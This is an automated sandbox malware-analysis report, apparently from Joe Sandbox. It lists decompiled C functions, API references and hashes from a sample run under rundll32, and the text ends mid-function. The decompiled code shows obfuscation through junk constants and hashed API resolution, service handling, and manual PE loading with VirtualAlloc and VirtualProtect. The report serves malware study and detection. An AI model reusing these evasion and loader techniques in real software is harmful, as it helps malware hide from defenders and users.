				intOrPtr* _t63;
				void* _t76;
				void* _t77;
				intOrPtr* _t80;
				char* _t81;
				char _t84;
				intOrPtr* _t87;
				intOrPtr* _t118;
				intOrPtr* _t123;
				void* _t124;
				void* _t125;

				_push(0x54);
				E10007B94(E1001557E, __ebx, __edi, __esi);
				_t84 =  *((intOrPtr*)(_t124 + 8));
				_t123 = __ecx;
				if(_t84 != 0xffffffff) {
					_t87 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x24))));
					_t118 = 0;
					__eflags = _t87;
					if(_t87 == 0) {
						L7:
						_t50 =  *((intOrPtr*)(_t123 + 0x4c));
						__eflags = _t50 - _t118;
						if(_t50 != _t118) {
							__eflags =  *((intOrPtr*)(_t123 + 0x3c)) - _t118;
							if(__eflags != 0) {
								 *((char*)(_t124 - 0x30)) = _t84;
								E1000563A(_t84, _t124 - 0x2c, _t109, 8, _t118);
								 *((intOrPtr*)(_t124 - 4)) = _t118;
								_t54 = E10004AEE(E10005335(_t124 - 0x2c, _t124 - 0x48));
								_t57 = E10004AEE(E10005335(_t124 - 0x2c, _t124 - 0x50));
								_t118 =  *((intOrPtr*)(_t124 - 0x18)) + _t54;
								_push(_t124 - 0x38);
								_t84 = _t123 + 0x44;
								while(1) {
									_t113 = _t124 - 0x30;
									 *((intOrPtr*)(_t124 - 0x34)) = _t57;
									_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x3c)))) + 0x14))(_t84, _t124 - 0x30, _t124 - 0x2f, _t124 - 0x3c, _t57, _t118);
									__eflags = _t59;
									if(_t59 < 0) {
										break;
									}
									__eflags = _t59 - 1;
									if(_t59 > 1) {
										__eflags = _t59 - 3;
										if(__eflags != 0) {
											goto L25;
										} else {
											_t63 = E1000513D(__eflags,  *((intOrPtr*)(_t124 - 0x30)),  *((intOrPtr*)(_t123 + 0x4c)));
											__eflags = _t63;
											if(_t63 != 0) {
												goto L27;
											} else {
												goto L25;
											}
										}
									} else {
										_t118 =  *((intOrPtr*)(_t124 - 0x38)) - E10004AEE(E10005335(_t124 - 0x2c, _t124 - 0x58));
										__eflags = _t118;
										if(_t118 == 0) {
											L16:
											_t67 = _t124 - 0x30;
											 *((char*)(_t123 + 0x41)) = 1;
											__eflags =  *((intOrPtr*)(_t124 - 0x3c)) - _t124 - 0x30;
											if( *((intOrPtr*)(_t124 - 0x3c)) != _t124 - 0x30) {
												L27:
												_t123 =  *((intOrPtr*)(_t124 + 8));
											} else {
												__eflags = _t118;
												if(_t118 > 0) {
													L20:
													 *((intOrPtr*)(_t124 - 0x40)) = E10004AEE(E10005335(_t124 - 0x2c, _t124 - 0x48));
													_t57 = E10004AEE(E10005335(_t124 - 0x2c, _t124 - 0x50));
													_push(_t124 - 0x38);
													_t118 =  *((intOrPtr*)(_t124 - 0x18)) +  *((intOrPtr*)(_t124 - 0x40));
													__eflags = _t118;
													continue;
												} else {
													__eflags =  *((intOrPtr*)(_t124 - 0x18)) - 0x20;
													if( *((intOrPtr*)(_t124 - 0x18)) >= 0x20) {
														goto L25;
													} else {
														E1000540E(_t67, _t124 - 0x2c, _t113, _t123, 8, 0);
														goto L20;
													}
												}
											}
										} else {
											_t76 = E10004AEE(E10005335(_t124 - 0x2c, _t124 - 0x60));
											_push( *((intOrPtr*)(_t123 + 0x4c)));
											_push(_t118);
											_push(1);
											_push(_t76);
											_t77 = E1000910B(_t84, _t113, _t118, _t123, __eflags);
											_t125 = _t125 + 0x10;
											__eflags = _t118 - _t77;
											if(_t118 != _t77) {
												L25:
												__eflags = _t123;
											} else {
												goto L16;
											}
										}
									}
									E10001220(_t124 - 0x2c, _t124, 1, 0);
									goto L2;
								}
								goto L25;
							} else {
								_t50 = E1000513D(__eflags, _t84, _t50); // executed
								__eflags = _t50;
								if(_t50 == 0) {
									goto L8;
								} else {
									goto L6;
								}
							}
						} else {
							L8:
						}
					} else {
						_t80 =  *((intOrPtr*)(__ecx + 0x34));
						_t109 =  *_t80 + _t87;
						__eflags = _t87 -  *_t80 + _t87;
						if(_t87 >=  *_t80 + _t87) {
							goto L7;
						} else {
							 *_t80 =  *_t80 - 1;
							__eflags =  *_t80;
							_t123 =  *((intOrPtr*)(__ecx + 0x24));
							_t81 =  *_t123;
							 *_t123 = _t81 + 1;
							 *_t81 = _t84;
							L6:
						}
					}
				} else {
				}
				L2:
				return E10007BDE(_t84, _t118, _t123);
			}

0x10005838
0x1000583f
0x10005844
0x10005847
0x1000584c
0x1000585b
0x1000585d
0x1000585f
0x10005861
0x10005880
0x10005880
0x10005883
0x10005885
0x1000588c
0x1000588f
0x100058a6
0x100058a9
0x100058b5
0x100058bf
0x100058d7
0x100058df
0x100058e1
0x100058e2
0x10005992
0x1000599f
0x100059a3
0x100059a9
0x100059ac
0x100059ae
0x00000000
0x00000000
0x100058ea
0x100058ed
0x100059b6
0x100059b9
0x00000000
0x100059bb
0x100059c1
0x100059c8
0x100059ca
0x00000000
0x00000000
0x00000000
0x00000000
0x100059ca
0x100058f3
0x10005909
0x10005909
0x1000590b
0x10005937
0x10005937
0x1000593a
0x1000593e
0x10005941
0x100059e2
0x100059e2
0x10005947
0x10005947
0x10005949
0x1000595d
0x10005973
0x10005984
0x1000598c
0x10005990
0x10005990
0x00000000
0x1000594b
0x1000594b
0x1000594f
0x00000000
0x10005951
0x10005958
0x00000000
0x10005958
0x1000594f
0x10005949
0x1000590d
0x1000591b
0x10005920
0x10005923
0x10005924
0x10005926
0x10005927
0x1000592c
0x1000592f
0x10005931
0x100059cc
0x100059cc
0x00000000
0x00000000
0x00000000
0x10005931
0x1000590b
0x100059d6
0x00000000
0x100059db
0x00000000
0x10005891
0x10005893
0x1000589a
0x1000589c
0x00000000
0x1000589e
0x00000000
0x1000589e
0x1000589c
0x10005887
0x10005887
0x10005887
0x10005863
0x10005863
0x10005868
0x1000586a
0x1000586c
0x00000000
0x1000586e
0x1000586e
0x1000586e
0x10005870
0x10005873
0x10005878
0x1000587a
0x1000587c
0x1000587c
0x1000586c
0x1000584e
0x1000584e
0x10005850
0x10005855

APIs

__EH_prolog3_GS.LIBCMT ref: 1000583F
_Fputc.LIBCPMT ref: 10005893
_Fputc.LIBCPMT ref: 100059C1

Strings

, xrefs: 1000594B

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Fputc$H_prolog3_
String ID:
API String ID: 2569218679-3916222277
Opcode ID: a884318f4328bbd472d3bb720561ede03dd2b99da71aac4f53e77f2ee89f8c52
Instruction ID: f54ee80827257d936e0228d5c33a263367e2bb758273396e4a1a0a6abebb7dc9
Opcode Fuzzy Hash: a884318f4328bbd472d3bb720561ede03dd2b99da71aac4f53e77f2ee89f8c52
Instruction Fuzzy Hash: A7519F7AA00644DFEF14CBA4C8819DFB7B5EF483D1F618519E512A7289EF72BA04CB50

Uniqueness

Uniqueness Score: -1.00%

Function 002A7FC8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E002A7FC8(void* __ecx, long __edx, intOrPtr _a4, long _a8, intOrPtr _a12, void* _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t43;
				void* _t54;
				signed int _t56;
				signed int _t57;
				long _t64;

				_push(_a16);
				_t64 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0029E171(_t43);
				_v12 = 0x3d4b;
				_v12 = _v12 + 0xba0c;
				_v12 = _v12 ^ 0x32f19bab;
				_v12 = _v12 ^ 0x32f14d3d;
				_v20 = 0x6588;
				_t56 = 0x46;
				_v20 = _v20 / _t56;
				_v20 = _v20 ^ 0x00006149;
				_v8 = 0xc11f;
				_t57 = 0x1c;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x00002da7;
				_v16 = 0xd6d7;
				_v16 = _v16 ^ 0xb4edc2cf;
				_v16 = _v16 ^ 0xb4ed5042;
				E0029606F(0xac, 0xb6b01ae5, _t57, _t57, 0xfa5912f8);
				_t54 = RtlAllocateHeap(_a16, _t64, _a8); // executed
				return _t54;
			}

0x002a7fcf
0x002a7fd2
0x002a7fd4
0x002a7fd7
0x002a7fda
0x002a7fdd
0x002a7fdf
0x002a7fe4
0x002a7fed
0x002a7ff4
0x002a7ffb
0x002a8002
0x002a800e
0x002a8013
0x002a8018
0x002a801f
0x002a8029
0x002a8034
0x002a8037
0x002a803b
0x002a8042
0x002a8049
0x002a8050
0x002a806f
0x002a807e
0x002a8084

APIs

RtlAllocateHeap.NTDLL(?,026DAAD3,B4ED5042,?,?,?,?,?,?,?,?,?,?), ref: 002A807E

Strings

K=, xrefs: 002A7FE4
Ia, xrefs: 002A8018

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: Ia$K=
API String ID: 1279760036-1694132640
Opcode ID: b789e11f9eea775a78287693f7352f71c317194be4ff8f8270c2d0e745cba24f
Instruction ID: c4ebe0619dc580e947336d6607a62692ac3abde725258ea9b5a79e7f2b36ced1
Opcode Fuzzy Hash: b789e11f9eea775a78287693f7352f71c317194be4ff8f8270c2d0e745cba24f
Instruction Fuzzy Hash: 68115971E00218EBEF04DFE5C94A8DEBFB2FB41310F108189EA1466250C3B69A218B91

Uniqueness

Uniqueness Score: -1.00%

Function 002A29A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 002A2A76

Strings

-:, xrefs: 002A29C4

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: -:
API String ID: 1514166925-3625610842
Opcode ID: f512e2cfcb210f02178d04eca577d79f121b754574598481bdb18aec6494e751
Instruction ID: 8e40522ad9ed047add1e73fe200c5b9351c3b3761264ad41aeaa2a7e2b3e5691
Opcode Fuzzy Hash: f512e2cfcb210f02178d04eca577d79f121b754574598481bdb18aec6494e751
Instruction Fuzzy Hash: F82123B2D01219BBDF15DFD5C84A8DEBBB5FF04758F108188E92866250D3B94B64DF90

Uniqueness

Uniqueness Score: -1.00%

Function 002930A4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E002930A4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				int _t51;
				signed int _t53;
				signed int _t54;
				void* _t61;

				_push(_a12);
				_t61 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0029E171(_t40);
				_v20 = 0x20f1;
				_v20 = _v20 | 0xe56d7bd2;
				_v20 = _v20 ^ 0xe56d3b5f;
				_v16 = 0x60a3;
				_v16 = _v16 | 0xd94b0631;
				_v16 = _v16 ^ 0xd94b4fc4;
				_v8 = 0x959e;
				_t53 = 0x46;
				_v8 = _v8 / _t53;
				_v8 = _v8 + 0xffff8b5f;
				_t54 = 0x4f;
				_v8 = _v8 / _t54;
				_v8 = _v8 ^ 0x033dd111;
				_v12 = 0xe903;
				_v12 = _v12 + 0xffff1267;
				_v12 = _v12 ^ 0xffffff7c;
				E0029606F(0x14b, 0xbee648b, _t54, _t54, 0x43269794);
				_t51 = CloseServiceHandle(_t61); // executed
				return _t51;
			}

0x002930ab
0x002930ae
0x002930b0
0x002930b3
0x002930b7
0x002930b8
0x002930bd
0x002930c6
0x002930cd
0x002930d4
0x002930db
0x002930e2
0x002930e9
0x002930f5
0x002930fa
0x002930ff
0x00293109
0x00293114
0x00293117
0x0029311e
0x00293125
0x0029312c
0x0029314b
0x00293154
0x0029315a

APIs

CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 00293154

Strings

_;m, xrefs: 0029313C

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: _;m
API String ID: 1725840886-664033043
Opcode ID: 645477ed48e2118058f0cbc5a8afeb89a96a5cc23f06e2a0e3471286d8c9f7a7
Instruction ID: 18cc76b02e2076fa666cb4333c599258ea69b8fbb8d81bf719289a424dee3273
Opcode Fuzzy Hash: 645477ed48e2118058f0cbc5a8afeb89a96a5cc23f06e2a0e3471286d8c9f7a7
Instruction Fuzzy Hash: B1112B76E00218FFEB04DFE8CC468DEBBB1EB44310F108599E524AB292D7B55B119B91

Uniqueness

Uniqueness Score: -1.00%

Function 0029E172, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E0029E172(void* __ecx, void* __edx, void* _a4, int _a8, short* _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t41;
				void* _t48;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0029E171(_t41);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x2ee32c;
				_v20 = 0x466;
				_v20 = _v20 + 0xbcb9;
				_v20 = _v20 ^ 0x000097c2;
				_v8 = 0x1d17;
				_v8 = _v8 + 0xe3a6;
				_v8 = _v8 | 0x1371b482;
				_v8 = _v8 + 0xcae3;
				_v8 = _v8 ^ 0x13721426;
				_v16 = 0xc1c8;
				_v16 = _v16 + 0xffff2ba9;
				_v16 = _v16 ^ 0xffffbe8b;
				_v12 = 0x3352;
				_v12 = _v12 << 9;
				_v12 = _v12 | 0x4940d942;
				_v12 = _v12 ^ 0x4966c2a7;
				E0029606F(0x24f, 0xbee648b, __ecx, __ecx, 0x334b429d);
				_t48 = OpenServiceW(_a4, _a12, _a8); // executed
				return _t48;
			}

0x0029e178
0x0029e17b
0x0029e17e
0x0029e181
0x0029e185
0x0029e186
0x0029e18b
0x0029e192
0x0029e19e
0x0029e1a5
0x0029e1ac
0x0029e1b3
0x0029e1ba
0x0029e1c1
0x0029e1c8
0x0029e1cf
0x0029e1d6
0x0029e1dd
0x0029e1e4
0x0029e1eb
0x0029e1f2
0x0029e1f6
0x0029e1fd
0x0029e21c
0x0029e22d
0x0029e232

APIs

OpenServiceW.ADVAPI32(4966C2A7,000097C2,FFFFBE8B,?,?,?,?,?,?,?,?,?,?), ref: 0029E22D

Strings

,., xrefs: 0029E192

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: ,.
API String ID: 3098006287-263192673
Opcode ID: 47688d64d3b0e0483b819327fb3ad2d4dd2b99bd4eab320a8e24d3c64762cb4c
Instruction ID: 8f9dfb37af74682e2cbe84333752efd0c47dabe576e0eaeaaa4c1143538de350
Opcode Fuzzy Hash: 47688d64d3b0e0483b819327fb3ad2d4dd2b99bd4eab320a8e24d3c64762cb4c
Instruction Fuzzy Hash: 781107B6D0020DFFEF05DFD4C94A8AEBB70FB14304F108188E91566261D3B58B249F91

Uniqueness

Uniqueness Score: -1.00%

Function 002A7998, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 28%

			E002A7998(void* __ecx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* __edx;
				void* _t42;
				struct HINSTANCE__* _t49;
				void* _t52;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0029E171(_t42);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x25d38;
				_v20 = 0x510f;
				_v20 = _v20 >> 8;
				_v20 = _v20 ^ 0x00005672;
				_v16 = 0xf8b1;
				_v16 = _v16 + 0xffff15e9;
				_v16 = _v16 + 0xffffcd36;
				_v16 = _v16 ^ 0xffff83d2;
				_v12 = 0x4d1a;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000018af;
				_v8 = 0x7f5d;
				_v8 = _v8 ^ 0x2c3d59fe;
				_v8 = _v8 + 0x58d2;
				_v8 = _v8 << 0xe;
				_v8 = _v8 ^ 0x5fdd21ae;
				_push(0x811bfff3);
				_push(0xb6b01ae5);
				_t52 = 0x55;
				E0029606F(_t52);
				_t49 = LoadLibraryW(_a12); // executed
				return _t49;
			}

0x002a799e
0x002a79a1
0x002a79a4
0x002a79a9
0x002a79ae
0x002a79b5
0x002a79bc
0x002a79c3
0x002a79c7
0x002a79ce
0x002a79d5
0x002a79dc
0x002a79e3
0x002a79ea
0x002a79f1
0x002a79f5
0x002a79f9
0x002a79fd
0x002a7a04
0x002a7a0b
0x002a7a12
0x002a7a19
0x002a7a1d
0x002a7a30
0x002a7a37
0x002a7a3e
0x002a7a3f
0x002a7a4a
0x002a7a4f

APIs

LoadLibraryW.KERNEL32(00005672,?,?,?,?,?,?,?,?,38246A1A), ref: 002A7A4A

Strings

rV, xrefs: 002A79C7

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: rV
API String ID: 1029625771-3738762570
Opcode ID: 6c2337c38b901229c7e322e5f1d9b1029b3c9dada85b33bca72088930e709091
Instruction ID: 0cfd6e5be22c3bc8fbd2cae7648da33558f4b092db58a0b515a428ed118ec78f
Opcode Fuzzy Hash: 6c2337c38b901229c7e322e5f1d9b1029b3c9dada85b33bca72088930e709091
Instruction Fuzzy Hash: 8B11F6B6D1160DBBDB14DFA4C84A49EBBB4BB00309F208588E52566250D3B54B149F50

Uniqueness

Uniqueness Score: -1.00%

Function 002AC7C3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E002AC7C3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t44;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x43a94f;
				_v32 = 0x1049b9;
				_v28 = 0x3eaad4;
				_v20 = 0xf167;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x00002afd;
				_v12 = 0xf1a2;
				_v12 = _v12 + 0xb8a5;
				_v12 = _v12 | 0x0ef61b66;
				_v12 = _v12 ^ 0xe07f37e9;
				_v12 = _v12 ^ 0xee88d275;
				_v8 = 0xe943;
				_v8 = _v8 + 0xe3dd;
				_v8 = _v8 | 0x8abcb7de;
				_v8 = _v8 + 0xffff75bb;
				_v8 = _v8 ^ 0x8abd009e;
				_v16 = 0x92be;
				_v16 = _v16 + 0xa80e;
				_v16 = _v16 ^ 0x00014c59;
				_push(0xec5aa560);
				_push(_t43);
				_push(0xb6b01ae5);
				_t44 = 0x2d;
				E0029606F(_t44);
				ExitProcess(0);
			}

0x002ac7c9
0x002ac7cd
0x002ac7d4
0x002ac7db
0x002ac7e2
0x002ac7e9
0x002ac7ed
0x002ac7f4
0x002ac7fb
0x002ac802
0x002ac809
0x002ac810
0x002ac817
0x002ac81e
0x002ac825
0x002ac82c
0x002ac833
0x002ac83b
0x002ac842
0x002ac849
0x002ac85c
0x002ac862
0x002ac863
0x002ac86a
0x002ac86b
0x002ac875

APIs

ExitProcess.KERNELBASE(00000000), ref: 002AC875

Strings

C, xrefs: 002AC817

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: C
API String ID: 621844428-3705061908
Opcode ID: 5166b79bcc50a558bfb193a34fc174177961b77d3bd12aa0b8ebd5d1b0848ce2
Instruction ID: 4855eff9904bd00d43cf590d6719fd8faa279bbd1b69bea14027209588d5f43a
Opcode Fuzzy Hash: 5166b79bcc50a558bfb193a34fc174177961b77d3bd12aa0b8ebd5d1b0848ce2
Instruction Fuzzy Hash: 3C110AB5D0131DEBEB44CFE5D94A5AEBBB0FB04318F108189D51176291D3B85B489F81

Uniqueness

Uniqueness Score: -1.00%

Function 10003ED0, Relevance: 3.1, APIs: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E10003ED0(intOrPtr* _a4, long _a8) {
				signed int _t25;
				signed int _t27;
				intOrPtr* _t32;
				void** _t37;
				signed int _t39;
				long _t45;
				void* _t55;
				long _t57;

				_t37 = _a8;
				_t57 = _t37[2];
				if(_t57 != 0) {
					_t25 = _t37[3];
					if((_t25 & 0x02000000) == 0) {
						_t45 =  *(0x1001b160 + ((_t25 >> 0x1f) + ((_t25 >> 0x0000001e & 0x00000001) + (_t25 >> 0x0000001d & 0x00000001) * 2) * 2) * 4);
						if((_t25 & 0x04000000) != 0) {
							_t45 = _t45 | 0x00000200;
						}
						_t27 = VirtualProtect( *_t37, _t57, _t45,  &_a8); // executed
						asm("sbb eax, eax");
						return  ~( ~_t27);
					} else {
						_t55 =  *_t37;
						if(_t55 == _t37[1]) {
							if(_t37[4] != 0) {
								L7:
								VirtualFree(_t55, _t57, 0x4000); // executed
							} else {
								_t32 = _a4;
								_t39 =  *(_t32 + 0x30);
								if( *((intOrPtr*)( *_t32 + 0x38)) == _t39 || _t57 % _t39 == 0) {
									goto L7;
								}
							}
						}
						return 1;
					}
				} else {
					return _t57 + 1;
				}
			}

0x10003ed0
0x10003ed5
0x10003eda
0x10003ee3
0x10003eec
0x10003f45
0x10003f51
0x10003f53
0x10003f53
0x10003f63
0x10003f6b
0x10003f71
0x10003eee
0x10003eee
0x10003ef3
0x10003ef9
0x10003f13
0x10003f1a
0x10003efb
0x10003efb
0x10003eff
0x10003f07
0x00000000
0x00000000
0x10003f07
0x10003ef9
0x10003f27
0x10003f27
0x10003edc
0x10003ee0
0x10003ee0

APIs

VirtualFree.KERNELBASE(?,?,00004000,-00000027,00000000,100040AE,?,?), ref: 10003F1A

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 320265ec8e706461fa2b1d62bde387e903148c90b6cadf7e299ff5ffbb203ee4
Instruction ID: 95e8f1748b5aba1564384e429b0d0e262c9b8019464e15d1761e645376b53ce0
Opcode Fuzzy Hash: 320265ec8e706461fa2b1d62bde387e903148c90b6cadf7e299ff5ffbb203ee4
Instruction Fuzzy Hash: 1E118F36A042139BE341CA19D884FA773BAFBC5390F56C669E4058B299D771EC42C790

Uniqueness

Uniqueness Score: -1.00%

Function 002A0DE5, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E002A0DE5(void* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __edx;
				void* _t41;
				int _t53;
				signed int _t55;
				void* _t59;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0029E171(_t41);
				_v8 = 0x13b8;
				_v8 = _v8 + 0x3dca;
				_v8 = _v8 | 0xf08d47e2;
				_t55 = 0x6c;
				_v8 = _v8 * 0x4b;
				_v8 = _v8 ^ 0x7968eec6;
				_v20 = 0x39de;
				_push(0x457707f1);
				_v20 = _v20 / _t55;
				_v20 = _v20 ^ 0x00003bca;
				_v16 = 0x3217;
				_push(_t55);
				_push(_t55);
				_push(0xb6b01ae5);
				_v16 = _v16 * 0x55;
				_v16 = _v16 | 0x68e2e048;
				_v16 = _v16 ^ 0x68f2fb55;
				_v12 = 0x5ca5;
				_v12 = _v12 | 0x2e6919c4;
				_t59 = 0x3f;
				_v12 = _v12 * 0x2e;
				_v12 = _v12 ^ 0x56eeeba3;
				E0029606F(_t59);
				_t53 = CloseHandle(_a8); // executed
				return _t53;
			}

0x002a0deb
0x002a0dee
0x002a0df1
0x002a0df6
0x002a0dfb
0x002a0e04
0x002a0e0b
0x002a0e18
0x002a0e1c
0x002a0e1f
0x002a0e26
0x002a0e32
0x002a0e37
0x002a0e3a
0x002a0e41
0x002a0e4c
0x002a0e4d
0x002a0e4e
0x002a0e55
0x002a0e58
0x002a0e5f
0x002a0e66
0x002a0e6d
0x002a0e78
0x002a0e79
0x002a0e7c
0x002a0e8f
0x002a0e9a
0x002a0e9f

APIs

CloseHandle.KERNELBASE(68F2FB55,?,?,?,?,?,?,?,?,00000000), ref: 002A0E9A

Strings

Hh, xrefs: 002A0E58

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: Hh
API String ID: 2962429428-996502550
Opcode ID: e7d45c783abdec88297e9039aa05dbf03639c62c0080e51466ba891bf10a3185
Instruction ID: c78bebd5dc95d5b4a537bf6b2df1153e1aa12908897d4fd54d048164b763b693
Opcode Fuzzy Hash: e7d45c783abdec88297e9039aa05dbf03639c62c0080e51466ba891bf10a3185
Instruction Fuzzy Hash: 73110374D0020DEBEF09DFA8C9869AEBFB5EB40304F60C599E524AB261D3B95B118F40

Uniqueness

Uniqueness Score: -1.00%

Function 10003DA0, Relevance: 2.6, APIs: 2, Instructions: 95
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003DA0(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t38;
				intOrPtr _t44;
				void* _t47;
				intOrPtr _t66;
				long _t67;
				long* _t70;
				void* _t76;

				_t76 =  &_v8;
				_t27 = _a16;
				_t44 =  *((intOrPtr*)(_t27 + 4));
				_t28 =  *_t27;
				_v4 = __ecx;
				_t47 = ( *(_t28 + 0x14) & 0x0000ffff) + _t28 + 0x18;
				_v8 = 0;
				if(0 >=  *((intOrPtr*)(_t28 + 6))) {
					L11:
					return 1;
				} else {
					_t70 = _t47 + 0x10;
					do {
						_t30 =  *_t70;
						if( *_t70 != 0) {
							if(E10003D80(_a8, _t70[1] + _t30) == 0) {
								goto L12;
							} else {
								_t34 = VirtualAlloc( *((intOrPtr*)(_t70 - 4)) + _t44,  *_t70, 0x1000, 4); // executed
								if(_t34 == 0) {
									goto L12;
								} else {
									_t66 =  *((intOrPtr*)(_t70 - 4)) + _t44;
